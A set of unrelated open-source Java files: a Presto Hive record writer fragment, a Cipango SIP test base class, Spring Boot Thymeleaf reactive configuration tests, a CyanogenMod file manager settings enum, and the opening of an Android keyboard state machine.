.collect(toMap(DataColumn::getName, identity()));
Set<String> missingColumns = Sets.difference(inputColumnMap.keySet(), new HashSet<>(fileColumnNames));
if (!missingColumns.isEmpty()) {
                throw new PrestoException(NOT_FOUND, format("Table %s.%s does not have columns %s", schemaName, tableName, missingColumns));
}
if (fileColumnNames.size() != fileColumnHiveTypes.size()) {
throw new PrestoException(HIVE_INVALID_METADATA, format("Partition '%s' in table '%s.%s' has mismatched metadata for column names and types",
partitionName,
schemaName,
tableName));
}
// verify the file types match the input type
// todo adapt input types to the file types as Hive does
for (int fileIndex = 0; fileIndex < fileColumnNames.size(); fileIndex++) {
String columnName = fileColumnNames.get(fileIndex);
HiveType fileColumnHiveType = fileColumnHiveTypes.get(fileIndex);
HiveType inputHiveType = inputColumnMap.get(columnName).getHiveType();
if (!fileColumnHiveType.equals(inputHiveType)) {
// todo this should be moved to a helper
throw new PrestoException(HIVE_PARTITION_SCHEMA_MISMATCH, format("" +
"There is a mismatch between the table and partition schemas. " +
"The column '%s' in table '%s.%s' is declared as type '%s', " +
"but partition '%s' declared column '%s' as type '%s'.",
columnName,
schemaName,
tableName,
inputHiveType,
partitionName,
columnName,
fileColumnHiveType));
}
}
fieldCount = fileColumnNames.size();
if (serDe.equals(org.apache.hadoop.hive.serde2.columnar.LazyBinaryColumnarSerDe.class.getName())) {
serDe = OptimizedLazyBinaryColumnarSerde.class.getName();
}
serializer = initializeSerializer(conf, schema, serDe);
recordWriter = HiveWriteUtils.createRecordWriter(new Path(writePath, fileName), conf, compress, schema, outputFormat);
List<Type> fileColumnTypes = fileColumnHiveTypes.stream()
.map(hiveType -> hiveType.getType(typeManager))
.collect(toList());
tableInspector = getStandardStructObjectInspector(fileColumnNames, getRowColumnInspectors(fileColumnTypes));
// reorder (and possibly reduce) struct fields to match input
structFields = ImmutableList.copyOf(inputColumns.stream()
.map(DataColumn::getName)
.map(tableInspector::getStructFieldRef)
.collect(toList()));
row = tableInspector.create();
setters = new FieldSetter[structFields.size()];
for (int i = 0; i < setters.length; i++) {
setters[i] = createFieldSetter(tableInspector, row, structFields.get(i), inputColumns.get(i).getType());
}
}
public void addRow(Block[] columns, int position)
{
for (int field = 0; field < fieldCount; field++) {
if (columns[field].isNull(position)) {
tableInspector.setStructFieldData(row, structFields.get(field), null);
}
else {
setters[field].setField(columns[field], position);
}
}
try {
recordWriter.write(serializer.serialize(row, tableInspector));
}
catch (SerDeException | IOException e) {
throw new PrestoException(HIVE_WRITER_DATA_ERROR, e);
}
}
public void commit()
{
try {
recordWriter.close(false);
}
catch (IOException e) {
throw new PrestoException(HIVE_WRITER_CLOSE_ERROR, "Error committing write to Hive", e);
}
}
public void rollback()
{
try {
recordWriter.close(true);
}
catch (IOException e) {
throw new PrestoException(HIVE_WRITER_CLOSE_ERROR, "Error rolling back write to Hive", e);
}
}
public PartitionUpdate getPartitionUpdate()
{
return new PartitionUpdate(
partitionName,
isNew,
writePath,
targetPath,
ImmutableList.of(fileName));
}
@SuppressWarnings("deprecation")
private static Serializer initializeSerializer(Configuration conf, Properties properties, String serializerName)
{
try {
Serializer result = (Serializer) Class.forName(serializerName).getConstructor().newInstance();
result.initialize(conf, properties);
return result;
}
catch (SerDeException | ReflectiveOperationException e) {
throw Throwables.propagate(e);
}
}
@Override
public String toString()
{
return toStringHelper(this)
.add("partitionName", partitionName)
.add("writePath", writePath)
.add("fileName", fileName)
.toString();
}
}
@VisibleForTesting
public static class DataColumn
{
private final String name;
private final Type type;
private final HiveType hiveType;
public DataColumn(String name, Type type, HiveType hiveType)
{
this.name = requireNonNull(name, "name is null");
this.type = requireNonNull(type, "type is null");
this.hiveType = requireNonNull(hiveType, "hiveType is null");
}
public String getName()
{
return name;
}
public Type getType()
{
return type;
}
public HiveType getHiveType()
{
return hiveType;
}
}
}
|
|
// ========================================================================
// Copyright 2009 NEXCOM Systems
// ------------------------------------------------------------------------
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// ========================================================================
package org.cipango.kaleo.sipunit;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.util.ListIterator;
import java.util.Properties;
import javax.sip.address.AddressFactory;
import javax.sip.header.Header;
import javax.sip.header.HeaderFactory;
import javax.sip.message.Message;
import org.cafesip.sipunit.SipPhone;
import org.cafesip.sipunit.SipStack;
import org.cafesip.sipunit.SipTestCase;
import org.cipango.kaleo.xcap.XcapUri;
public abstract class UaTestCase extends SipTestCase
{
protected static HeaderFactory __headerFactory;
protected static AddressFactory __addressFactory;
private SipStack _sipStack;
private SipPhone _alicePhone;
private SipPhone _bobPhone;
protected Properties _properties;
public UaTestCase()
{
try
{
_properties = new Properties();
_properties.load(getClass().getClassLoader().getResourceAsStream("integrationTests.properties"));
}
catch (Exception e)
{
throw new RuntimeException(e);
}
}
public void setContent(String xcapUri) throws IOException
{
XcapUri uri = new XcapUri(xcapUri, "/");
String doc = uri.getDocumentSelector().replace(":", "%3A");
File sourceFile = new File("target/test-classes/xcap-root", doc);
if (!sourceFile.exists())
sourceFile = new File("target/test-classes/xcap-root", doc.replace("@", "%40"));
InputStream is = new FileInputStream(sourceFile);
File outputFile = new File("target/test-data", doc.replace("@", "%40"));
outputFile.getParentFile().mkdirs();
ByteArrayOutputStream os = new ByteArrayOutputStream();
int read;
byte[] buffer = new byte[1024];
while ((read = is.read(buffer)) != -1) {
os.write(buffer, 0, read);
}
String content = new String(os.toByteArray());
content = content.replaceAll("http://xcap.cipango.org", getHttpXcapUri());
FileOutputStream fos = new FileOutputStream(outputFile);
fos.write(content.getBytes());
fos.close();
is.close();
}
public String getProtocol()
{
return _properties.getProperty("sipunit.test.protocol");
}
public int getInt(String property)
{
return Integer.parseInt(_properties.getProperty(property));
}
public int getLocalPort()
{
return getInt("sipunit.test.port");
}
public int getRemotePort()
{
return getInt("sipunit.proxy.port");
}
public String getRemoteHost()
{
return _properties.getProperty("sipunit.proxy.host");
}
public String getAliceUri()
{
return "sip:alice@" + _properties.getProperty("sipunit.test.domain");
}
public String getBobUri()
{
return "sip:bob@" + _properties.getProperty("sipunit.test.domain");
}
public String getTo()
{
return "sip:sipServlet@" + _properties.getProperty("sipunit.test.domain");
}
public String getHttpXcapUri()
{
return _properties.getProperty("http.xcap.uri");
}
public SipPhone getAlicePhone()
{
return _alicePhone;
}
public SipPhone getBobPhone()
{
try {
if (_bobPhone == null)
{
_bobPhone = _sipStack.createSipPhone(getRemoteHost(), getProtocol(),
getRemotePort(), getBobUri());
}
return _bobPhone;
} catch (Exception e) {
throw new RuntimeException(e);
}
}
public void setUp() throws Exception
{
_sipStack = new SipStack(getProtocol(), getLocalPort(), (Properties) _properties.clone());
SipStack.setTraceEnabled(_properties.getProperty("sipunit.trace").equalsIgnoreCase("true"));
_alicePhone = _sipStack.createSipPhone(getRemoteHost(), getProtocol(),
getRemotePort(), getAliceUri());
if (__headerFactory == null)
{
__headerFactory = _sipStack.getHeaderFactory();
__addressFactory = _sipStack.getAddressFactory();
}
}
public void tearDown() throws Exception
{
_alicePhone.dispose();
if (_bobPhone != null)
_bobPhone.dispose();
_sipStack.dispose();
}
/**
* Asserts that the given SIP message contains at least one occurrence of
* the specified header and that at least one occurrence of this header
* contains the given value. The assertion fails if no occurrence of the
     * header contains the value or if the header is not present in the message.
*
* @param sipMessage
* the SIP message.
* @param header
* the string identifying the header as specified in RFC-3261.
* @param value
     *            the string value to look for within the header. An exact
     *            (literal) string comparison is used; the assertion passes
     *            if any part of the header contents matches the given value.
*/
public void assertHeaderContains(Message sipMessage, String header,
String value)
{
        assertHeaderContains(null, sipMessage, header, value); // note: the value match is case-sensitive
}
/**
* Asserts that the given SIP message contains at least one occurrence of
* the specified header and that at least one occurrence of this header
* contains the given value. The assertion fails if no occurrence of the
     * header contains the value or if the header is not present in the message.
* Assertion failure output includes the given message text.
*
* @param msg
* message text to output if the assertion fails.
* @param sipMessage
* the SIP message.
* @param header
* the string identifying the header as specified in RFC-3261.
* @param value
     *            the string value to look for within the header. An exact
     *            (literal) string comparison is used; the assertion passes
     *            if any part of the header contents matches the given value.
*/
public void assertHeaderContains(String msg, Message sipMessage,
String header, String value)
{
assertNotNull("Null assert object passed in", sipMessage);
ListIterator<Header> l = sipMessage.getHeaders(header);
while (l.hasNext())
{
String h = ((Header) l.next()).toString();
if (h.indexOf(value) != -1)
return;
}
fail(msg);
}
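    // Illustrative use (added; the 'response' variable below is hypothetical):
    //   assertHeaderContains("Wrong event package", response, "Event", "presence");
    // passes as soon as any "Event" header of the message contains the substring "presence".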
public void assertBetween(int min, int max, int actual)
{
if (actual > max)
fail("Got " + actual + " when max is " + max);
else if (actual < min)
fail("Got " + actual + " when min is " + min);
}
}
|
|
/*
* Copyright 2012-2020 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.boot.autoconfigure.thymeleaf;
import java.io.File;
import java.util.Collections;
import java.util.Locale;
import nz.net.ultraq.thymeleaf.LayoutDialect;
import nz.net.ultraq.thymeleaf.decorators.strategies.GroupingRespectLayoutTitleStrategy;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.extension.ExtendWith;
import org.thymeleaf.TemplateEngine;
import org.thymeleaf.context.Context;
import org.thymeleaf.context.IContext;
import org.thymeleaf.extras.springsecurity5.util.SpringSecurityContextUtils;
import org.thymeleaf.spring5.ISpringWebFluxTemplateEngine;
import org.thymeleaf.spring5.SpringWebFluxTemplateEngine;
import org.thymeleaf.spring5.context.webflux.SpringWebFluxContext;
import org.thymeleaf.spring5.templateresolver.SpringResourceTemplateResolver;
import org.thymeleaf.spring5.view.reactive.ThymeleafReactiveViewResolver;
import org.thymeleaf.templateresolver.ITemplateResolver;
import org.springframework.boot.autoconfigure.AutoConfigurations;
import org.springframework.boot.test.context.runner.ReactiveWebApplicationContextRunner;
import org.springframework.boot.test.system.CapturedOutput;
import org.springframework.boot.test.system.OutputCaptureExtension;
import org.springframework.boot.testsupport.BuildOutput;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.http.MediaType;
import org.springframework.mock.http.server.reactive.MockServerHttpRequest;
import org.springframework.mock.web.server.MockServerWebExchange;
import org.springframework.security.authentication.TestingAuthenticationToken;
import org.springframework.security.core.context.SecurityContextImpl;
import org.springframework.test.util.ReflectionTestUtils;
import static org.assertj.core.api.Assertions.assertThat;
/**
* Tests for {@link ThymeleafAutoConfiguration} in Reactive applications.
*
* @author Brian Clozel
* @author Kazuki Shimizu
* @author Stephane Nicoll
*/
@ExtendWith(OutputCaptureExtension.class)
class ThymeleafReactiveAutoConfigurationTests {
private final BuildOutput buildOutput = new BuildOutput(getClass());
private final ReactiveWebApplicationContextRunner contextRunner = new ReactiveWebApplicationContextRunner()
.withConfiguration(AutoConfigurations.of(ThymeleafAutoConfiguration.class));
@Test
void createFromConfigClass() {
this.contextRunner.withPropertyValues("spring.thymeleaf.suffix:.html").run((context) -> {
TemplateEngine engine = context.getBean(TemplateEngine.class);
Context attrs = new Context(Locale.UK, Collections.singletonMap("foo", "bar"));
String result = engine.process("template", attrs).trim();
assertThat(result).isEqualTo("<html>bar</html>");
});
}
@Test
void overrideCharacterEncoding() {
this.contextRunner.withPropertyValues("spring.thymeleaf.encoding:UTF-16").run((context) -> {
ITemplateResolver resolver = context.getBean(ITemplateResolver.class);
assertThat(resolver).isInstanceOf(SpringResourceTemplateResolver.class);
assertThat(((SpringResourceTemplateResolver) resolver).getCharacterEncoding()).isEqualTo("UTF-16");
ThymeleafReactiveViewResolver views = context.getBean(ThymeleafReactiveViewResolver.class);
assertThat(views.getDefaultCharset().name()).isEqualTo("UTF-16");
});
}
@Test
void overrideMediaTypes() {
this.contextRunner.withPropertyValues("spring.thymeleaf.reactive.media-types:text/html,text/plain").run(
(context) -> assertThat(context.getBean(ThymeleafReactiveViewResolver.class).getSupportedMediaTypes())
.contains(MediaType.TEXT_HTML, MediaType.TEXT_PLAIN));
}
@Test
void overrideTemplateResolverOrder() {
this.contextRunner.withPropertyValues("spring.thymeleaf.templateResolverOrder:25")
.run((context) -> assertThat(context.getBean(ITemplateResolver.class).getOrder())
.isEqualTo(Integer.valueOf(25)));
}
@Test
void overrideViewNames() {
this.contextRunner.withPropertyValues("spring.thymeleaf.viewNames:foo,bar")
.run((context) -> assertThat(context.getBean(ThymeleafReactiveViewResolver.class).getViewNames())
.isEqualTo(new String[] { "foo", "bar" }));
}
@Test
void overrideMaxChunkSize() {
this.contextRunner.withPropertyValues("spring.thymeleaf.reactive.maxChunkSize:8KB")
.run((context) -> assertThat(
context.getBean(ThymeleafReactiveViewResolver.class).getResponseMaxChunkSizeBytes())
.isEqualTo(Integer.valueOf(8192)));
}
@Test
void overrideFullModeViewNames() {
this.contextRunner.withPropertyValues("spring.thymeleaf.reactive.fullModeViewNames:foo,bar").run(
(context) -> assertThat(context.getBean(ThymeleafReactiveViewResolver.class).getFullModeViewNames())
.isEqualTo(new String[] { "foo", "bar" }));
}
@Test
void overrideChunkedModeViewNames() {
this.contextRunner.withPropertyValues("spring.thymeleaf.reactive.chunkedModeViewNames:foo,bar").run(
(context) -> assertThat(context.getBean(ThymeleafReactiveViewResolver.class).getChunkedModeViewNames())
.isEqualTo(new String[] { "foo", "bar" }));
}
@Test
void overrideEnableSpringElCompiler() {
this.contextRunner.withPropertyValues("spring.thymeleaf.enable-spring-el-compiler:true").run(
(context) -> assertThat(context.getBean(SpringWebFluxTemplateEngine.class).getEnableSpringELCompiler())
.isTrue());
}
@Test
void enableSpringElCompilerIsDisabledByDefault() {
this.contextRunner.run(
(context) -> assertThat(context.getBean(SpringWebFluxTemplateEngine.class).getEnableSpringELCompiler())
.isFalse());
}
@Test
void overrideRenderHiddenMarkersBeforeCheckboxes() {
this.contextRunner.withPropertyValues("spring.thymeleaf.render-hidden-markers-before-checkboxes:true")
.run((context) -> assertThat(
context.getBean(SpringWebFluxTemplateEngine.class).getRenderHiddenMarkersBeforeCheckboxes())
.isTrue());
}
@Test
void enableRenderHiddenMarkersBeforeCheckboxesIsDisabledByDefault() {
this.contextRunner.run((context) -> assertThat(
context.getBean(SpringWebFluxTemplateEngine.class).getRenderHiddenMarkersBeforeCheckboxes()).isFalse());
}
@Test
void templateLocationDoesNotExist(CapturedOutput output) {
this.contextRunner.withPropertyValues("spring.thymeleaf.prefix:classpath:/no-such-directory/")
.run((context) -> assertThat(output).contains("Cannot find template location"));
}
@Test
void templateLocationEmpty(CapturedOutput output) {
new File(this.buildOutput.getTestResourcesLocation(), "empty-templates/empty-directory").mkdirs();
this.contextRunner.withPropertyValues("spring.thymeleaf.prefix:classpath:/empty-templates/empty-directory/")
.run((context) -> assertThat(output).doesNotContain("Cannot find template location"));
}
@Test
void useDataDialect() {
this.contextRunner.run((context) -> {
ISpringWebFluxTemplateEngine engine = context.getBean(ISpringWebFluxTemplateEngine.class);
Context attrs = new Context(Locale.UK, Collections.singletonMap("foo", "bar"));
String result = engine.process("data-dialect", attrs).trim();
assertThat(result).isEqualTo("<html><body data-foo=\"bar\"></body></html>");
});
}
@Test
void useJava8TimeDialect() {
this.contextRunner.run((context) -> {
ISpringWebFluxTemplateEngine engine = context.getBean(ISpringWebFluxTemplateEngine.class);
Context attrs = new Context(Locale.UK);
String result = engine.process("java8time-dialect", attrs).trim();
assertThat(result).isEqualTo("<html><body>2015-11-24</body></html>");
});
}
@Test
void useSecurityDialect() {
this.contextRunner.run((context) -> {
ISpringWebFluxTemplateEngine engine = context.getBean(ISpringWebFluxTemplateEngine.class);
MockServerWebExchange exchange = MockServerWebExchange.from(MockServerHttpRequest.get("/test").build());
exchange.getAttributes().put(SpringSecurityContextUtils.SECURITY_CONTEXT_MODEL_ATTRIBUTE_NAME,
new SecurityContextImpl(new TestingAuthenticationToken("alice", "admin")));
IContext attrs = new SpringWebFluxContext(exchange);
String result = engine.process("security-dialect", attrs);
assertThat(result).isEqualTo("<html><body><div>alice</div></body></html>" + System.lineSeparator());
});
}
@Test
void renderTemplate() {
this.contextRunner.run((context) -> {
ISpringWebFluxTemplateEngine engine = context.getBean(ISpringWebFluxTemplateEngine.class);
Context attrs = new Context(Locale.UK, Collections.singletonMap("foo", "bar"));
String result = engine.process("home", attrs).trim();
assertThat(result).isEqualTo("<html><body>bar</body></html>");
});
}
@Test
void layoutDialectCanBeCustomized() {
this.contextRunner.withUserConfiguration(LayoutDialectConfiguration.class)
.run((context) -> assertThat(
ReflectionTestUtils.getField(context.getBean(LayoutDialect.class), "sortingStrategy"))
.isInstanceOf(GroupingRespectLayoutTitleStrategy.class));
}
@Configuration(proxyBeanMethods = false)
static class LayoutDialectConfiguration {
@Bean
LayoutDialect layoutDialect() {
return new LayoutDialect(new GroupingRespectLayoutTitleStrategy());
}
}
}
|
|
/*
* Copyright (C) 2012 The CyanogenMod Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.cyanogenmod.filemanager.preferences;
import com.cyanogenmod.filemanager.util.FileHelper;
/**
* The enumeration of settings of the FileManager application.
*/
public enum FileManagerSettings {
/**
* Whether this is the first use of the application
* @hide
*/
SETTINGS_FIRST_USE("cm_filemanager_first_use", Boolean.TRUE), //$NON-NLS-1$
/**
* The access mode to use
* @hide
*/
SETTINGS_ACCESS_MODE("cm_filemanager_access_mode", AccessMode.SAFE), //$NON-NLS-1$
/**
* Whether secondary users are restricted to a chrooted console
* @hide
*/
SETTINGS_RESTRICT_SECONDARY_USERS_ACCESS("cm_filemanager_restrict_secondary_users_access",
Boolean.TRUE), //$NON-NLS-1$
/**
* The initial directory to be used.
* @hide
*/
SETTINGS_INITIAL_DIR("cm_filemanager_initial_dir", FileHelper.ROOT_DIRECTORY), //$NON-NLS-1$
/**
* The view mode to use (simple, details, or icons).
* @hide
*/
SETTINGS_LAYOUT_MODE("cm_filemanager_layout_mode", NavigationLayoutMode.DETAILS), //$NON-NLS-1$
/**
* The sort mode to use (name or date, ascending or descending).
* @hide
*/
SETTINGS_SORT_MODE("cm_filemanager_sort_mode", NavigationSortMode.NAME_ASC), //$NON-NLS-1$
/**
* Whether to sort directories before files.
* @hide
*/
SETTINGS_SHOW_DIRS_FIRST("cm_filemanager_show_dirs_first", Boolean.TRUE), //$NON-NLS-1$
/**
* Whether to show hidden files.
* @hide
*/
SETTINGS_SHOW_HIDDEN("cm_filemanager_show_hidden", Boolean.TRUE), //$NON-NLS-1$
/**
* Whether to show system files.
* @hide
*/
SETTINGS_SHOW_SYSTEM("cm_filemanager_show_system", Boolean.TRUE), //$NON-NLS-1$
/**
* Whether to show symlink files.
* @hide
*/
SETTINGS_SHOW_SYMLINKS("cm_filemanager_show_symlinks", Boolean.TRUE), //$NON-NLS-1$
/**
* Whether to use case-sensitive comparison when sorting files
* @hide
*/
SETTINGS_CASE_SENSITIVE_SORT("cm_filemanager_case_sensitive_sort", Boolean.FALSE), //$NON-NLS-1$
/**
* Defines the filetime format mode to use
* @hide
*/
SETTINGS_FILETIME_FORMAT_MODE(
"cm_filemanager_filetime_format_mode", FileTimeFormatMode.LOCALE), //$NON-NLS-1$
/**
* The disk usage percentage threshold at which the free disk widget shows a warning
* @hide
*/
SETTINGS_DISK_USAGE_WARNING_LEVEL(
"cm_filemanager_disk_usage_warning_level", //$NON-NLS-1$
new String("95")), //$NON-NLS-1$
/**
* Whether to compute folder statistics in the folder properties dialog
* @hide
*/
SETTINGS_COMPUTE_FOLDER_STATISTICS(
"cm_filemanager_compute_folder_statistics", Boolean.FALSE), //$NON-NLS-1$
/**
* Whether to display thumbnails of pictures, videos, etc.
* @hide
*/
SETTINGS_DISPLAY_THUMBS(
"cm_filemanager_show_thumbs", Boolean.FALSE), //$NON-NLS-1$
/**
* Whether to use the flinger gesture to remove items
* @hide
*/
SETTINGS_USE_FLINGER("cm_filemanager_use_flinger", Boolean.FALSE), //$NON-NLS-1$
/**
* Whether to highlight the search terms in the search results
* @hide
*/
SETTINGS_HIGHLIGHT_TERMS("cm_filemanager_highlight_terms", Boolean.TRUE), //$NON-NLS-1$
/**
* Whether to show the relevance widget in search results
* @hide
*/
SETTINGS_SHOW_RELEVANCE_WIDGET(
"cm_filemanager_show_relevance_widget", //$NON-NLS-1$
Boolean.TRUE),
/**
* How to sort the search results
* @hide
*/
SETTINGS_SORT_SEARCH_RESULTS_MODE(
"cm_filemanager_sort_search_results_mode", //$NON-NLS-1$
SearchSortResultMode.RELEVANCE),
/**
* Whether to save the search terms
* @hide
*/
SETTINGS_SAVE_SEARCH_TERMS("cm_filemanager_save_search_terms", Boolean.TRUE), //$NON-NLS-1$
/**
* Whether to show debug traces
* @hide
*/
SETTINGS_SHOW_TRACES("cm_filemanager_show_debug_traces", Boolean.FALSE), //$NON-NLS-1$
/**
* Whether the editor should display suggestions
* @hide
*/
SETTINGS_EDITOR_NO_SUGGESTIONS(
"cm_filemanager_editor_no_suggestions", Boolean.FALSE), //$NON-NLS-1$
/**
* Whether the editor should use word wrap
* @hide
*/
SETTINGS_EDITOR_WORD_WRAP("cm_filemanager_editor_word_wrap", Boolean.TRUE), //$NON-NLS-1$
/**
* Whether the editor should open binary files in a hex viewer
* @hide
*/
SETTINGS_EDITOR_HEXDUMP("cm_filemanager_editor_hexdump", Boolean.TRUE), //$NON-NLS-1$
/**
* Whether the editor should use syntax highlighting
* @hide
*/
SETTINGS_EDITOR_SYNTAX_HIGHLIGHT(
"cm_filemanager_editor_syntax_highlight", Boolean.TRUE), //$NON-NLS-1$
/**
* Whether the editor should use the theme's default color scheme for syntax highlighting
* @hide
*/
SETTINGS_EDITOR_SH_USE_THEME_DEFAULT(
"cm_filemanager_editor_sh_use_theme_default", Boolean.TRUE), //$NON-NLS-1$
/**
* The custom color scheme to use for syntax highlighting
* @hide
*/
SETTINGS_EDITOR_SH_COLOR_SCHEME(
"cm_filemanager_editor_sh_color_scheme", ""), //$NON-NLS-1$ //$NON-NLS-2$
/**
* The current theme to use in the app
* @hide
*/
SETTINGS_THEME("cm_filemanager_theme", //$NON-NLS-1$
"com.cyanogenmod.filemanager:light"); //$NON-NLS-1$
/**
* A broadcast intent that is sent when a setting was changed
*/
public final static String INTENT_SETTING_CHANGED =
"com.cyanogenmod.filemanager.INTENT_SETTING_CHANGED"; //$NON-NLS-1$
/**
* A broadcast intent that is sent when a theme was changed
*/
public final static String INTENT_THEME_CHANGED =
"com.cyanogenmod.filemanager.INTENT_THEME_CHANGED"; //$NON-NLS-1$
/**
* A broadcast intent that is sent when a file was changed
*/
public final static String INTENT_FILE_CHANGED =
"com.cyanogenmod.filemanager.INTENT_FILE_CHANGED"; //$NON-NLS-1$
/**
* The extra key with the preference key that was changed
*/
public final static String EXTRA_SETTING_CHANGED_KEY = "preference"; //$NON-NLS-1$
/**
* The extra key with the file key that was changed
*/
public final static String EXTRA_FILE_CHANGED_KEY = "file"; //$NON-NLS-1$
/**
* The extra key with the package of the theme that was changed
*/
public final static String EXTRA_THEME_PACKAGE = "package"; //$NON-NLS-1$
/**
* The extra key with the identifier of the theme that was changed
*/
public final static String EXTRA_THEME_ID = "id"; //$NON-NLS-1$
private final String mId;
private final Object mDefaultValue;
/**
* Constructor of <code>FileManagerSettings</code>.
*
* @param id The unique identifier of the setting
* @param defaultValue The default value of the setting
*/
private FileManagerSettings(String id, Object defaultValue) {
this.mId = id;
this.mDefaultValue = defaultValue;
}
/**
* Method that returns the unique identifier of the setting.
* @return the mId
*/
public String getId() {
return this.mId;
}
/**
* Method that returns the default value of the setting.
*
* @return Object The default value of the setting
*/
public Object getDefaultValue() {
return this.mDefaultValue;
}
/**
* Method that returns an instance of {@link FileManagerSettings} from its
* unique identifier.
*
* @param id The unique identifier
* @return FileManagerSettings The navigation sort mode
*/
public static FileManagerSettings fromId(String id) {
FileManagerSettings[] values = values();
int cc = values.length;
for (int i = 0; i < cc; i++) {
if (values[i].mId.equals(id)) {
return values[i];
}
}
return null;
}
}
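// ---------------------------------------------------------------------------------------------
// Editor's note: a minimal usage sketch, not part of the original file. It illustrates how a
// setting's id and default value are meant to be paired with Android SharedPreferences. The
// SettingsReaderSketch class and the SharedPreferences instance passed to it are hypothetical;
// only FileManagerSettings itself comes from the code above.
class SettingsReaderSketch {
    // Read a boolean setting, falling back to its declared default when it was never written.
    static boolean readBoolean(android.content.SharedPreferences prefs, FileManagerSettings setting) {
        boolean defaultValue = ((Boolean) setting.getDefaultValue()).booleanValue();
        return prefs.getBoolean(setting.getId(), defaultValue);
    }
    // Read a string-valued setting (for example SETTINGS_INITIAL_DIR) the same way.
    static String readString(android.content.SharedPreferences prefs, FileManagerSettings setting) {
        return prefs.getString(setting.getId(), String.valueOf(setting.getDefaultValue()));
    }
}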
|
|
/*
* Copyright (C) 2011 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.android.inputmethod.keyboard.internal;
import android.text.TextUtils;
import android.util.Log;
import com.udmurtlyk.extrainputmethod.latin.Constants;
import com.android.inputmethod.latin.utils.RecapitalizeStatus;
/**
* Keyboard state machine.
*
* This class contains all keyboard state transition logic.
*
* The input events are {@link #onLoadKeyboard(int, int)}, {@link #onSaveKeyboardState()},
* {@link #onPressKey(int,boolean,int,int)}, {@link #onReleaseKey(int,boolean,int,int)},
* {@link #onCodeInput(int,int,int)}, {@link #onFinishSlidingInput(int,int)},
* {@link #onUpdateShiftState(int,int)}, {@link #onResetKeyboardStateToAlphabet(int,int)}.
*
* The actions are {@link SwitchActions}'s methods.
*/
public final class KeyboardState {
private static final String TAG = KeyboardState.class.getSimpleName();
private static final boolean DEBUG_EVENT = false;
private static final boolean DEBUG_ACTION = false;
public interface SwitchActions {
public void setAlphabetKeyboard();
public void setAlphabetManualShiftedKeyboard();
public void setAlphabetAutomaticShiftedKeyboard();
public void setAlphabetShiftLockedKeyboard();
public void setAlphabetShiftLockShiftedKeyboard();
public void setEmojiKeyboard();
public void setSymbolsKeyboard();
public void setSymbolsShiftedKeyboard();
/**
* Request to call back {@link KeyboardState#onUpdateShiftState(int, int)}.
*/
public void requestUpdatingShiftState(final int currentAutoCapsState,
final int currentRecapitalizeState);
public void startDoubleTapShiftKeyTimer();
public boolean isInDoubleTapShiftKeyTimeout();
public void cancelDoubleTapShiftKeyTimer();
}
private final SwitchActions mSwitchActions;
private ShiftKeyState mShiftKeyState = new ShiftKeyState("Shift");
private ModifierKeyState mSymbolKeyState = new ModifierKeyState("Symbol");
// TODO: Merge {@link #mSwitchState}, {@link #mIsAlphabetMode}, {@link #mAlphabetShiftState},
// {@link #mIsSymbolShifted}, {@link #mPrevMainKeyboardWasShiftLocked}, and
// {@link #mPrevSymbolsKeyboardWasShifted} into single state variable.
private static final int SWITCH_STATE_ALPHA = 0;
private static final int SWITCH_STATE_SYMBOL_BEGIN = 1;
private static final int SWITCH_STATE_SYMBOL = 2;
private static final int SWITCH_STATE_MOMENTARY_ALPHA_AND_SYMBOL = 3;
private static final int SWITCH_STATE_MOMENTARY_SYMBOL_AND_MORE = 4;
private static final int SWITCH_STATE_MOMENTARY_ALPHA_SHIFT = 5;
private int mSwitchState = SWITCH_STATE_ALPHA;
// TODO: Consolidate these two mode booleans into one integer to distinguish between alphabet,
// symbols, and emoji mode.
private boolean mIsAlphabetMode;
private boolean mIsEmojiMode;
private AlphabetShiftState mAlphabetShiftState = new AlphabetShiftState();
private boolean mIsSymbolShifted;
private boolean mPrevMainKeyboardWasShiftLocked;
private boolean mPrevSymbolsKeyboardWasShifted;
private int mRecapitalizeMode;
// For handling double tap.
private boolean mIsInAlphabetUnshiftedFromShifted;
private boolean mIsInDoubleTapShiftKey;
private final SavedKeyboardState mSavedKeyboardState = new SavedKeyboardState();
static final class SavedKeyboardState {
public boolean mIsValid;
public boolean mIsAlphabetMode;
public boolean mIsAlphabetShiftLocked;
public boolean mIsEmojiMode;
public int mShiftMode;
@Override
public String toString() {
if (!mIsValid) return "INVALID";
if (mIsAlphabetMode) {
if (mIsAlphabetShiftLocked) return "ALPHABET_SHIFT_LOCKED";
return "ALPHABET_" + shiftModeToString(mShiftMode);
} else if (mIsEmojiMode) {
return "EMOJI";
} else {
return "SYMBOLS_" + shiftModeToString(mShiftMode);
}
}
}
public KeyboardState(final SwitchActions switchActions) {
mSwitchActions = switchActions;
mRecapitalizeMode = RecapitalizeStatus.NOT_A_RECAPITALIZE_MODE;
}
